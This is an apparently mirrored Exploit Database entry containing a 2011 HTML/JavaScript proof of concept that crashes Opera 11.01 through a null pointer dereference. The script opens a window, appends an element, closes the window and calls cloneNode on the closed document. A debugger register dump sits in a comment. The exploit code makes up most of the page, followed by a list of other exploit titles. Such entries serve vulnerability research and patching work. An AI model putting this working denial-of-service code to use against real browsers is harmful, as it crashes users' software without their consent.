Opera 11.01 – NULL PTR Dereference

Exploit Database
14 阅读

作者： echo

日期： 2011-03-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/16979/

<html>
<head>
<title>Opera 11.01 Null Ptr Derefer</title>
</head>
<body>
 <script type="text/JavaScript" language="JavaScript">
 
/*
* [+]. Title : Opera 11.01 Null Pointer Derefernce 
* [+]. Date : 15.03.2011 05:18
* [+]. Author: echo
* [+]. Version: 11.01
* [+]. Software link: http://www.opera.com/download/
* [+]. Tested on : Win32 xp home sp 2
* [+]. CVE : NULL
* ---------------------------------------
* 675B5646MOV ECX,DWORD PTR DS:[EDI+8] 
* DS:[00000008]=???
* ECX=00000000 
* EDI=00000000
*/
var iWin= window.open();
var iShit = iWin.document.createElement("ANY");
iWin.document.body.appendChild(iShit);
iWin.close();
iWin.document.cloneNode("HiH");

 </script>
</body>
</html>

last Exploits
Opera 11.01 – NULL PTR Dereference的更多信息

MASM32 11R – Crash (PoC)：
XnView – ‘.FlashPix’ Image Processing Heap Overflow：
LG G4 – lgdrmserver Binder Service Multiple Race Conditions：
GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)：
httpdx 1.5.3 – ‘.png’ File Handling Remote Denial of Service：
Apple macOS XNU Kernel – Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures：
TP-LINK TD-W8151N – Denial of Service：
PHP 5.3.x ‘Zip’ Extension – ‘stream_get_contents()’ Denial of Service：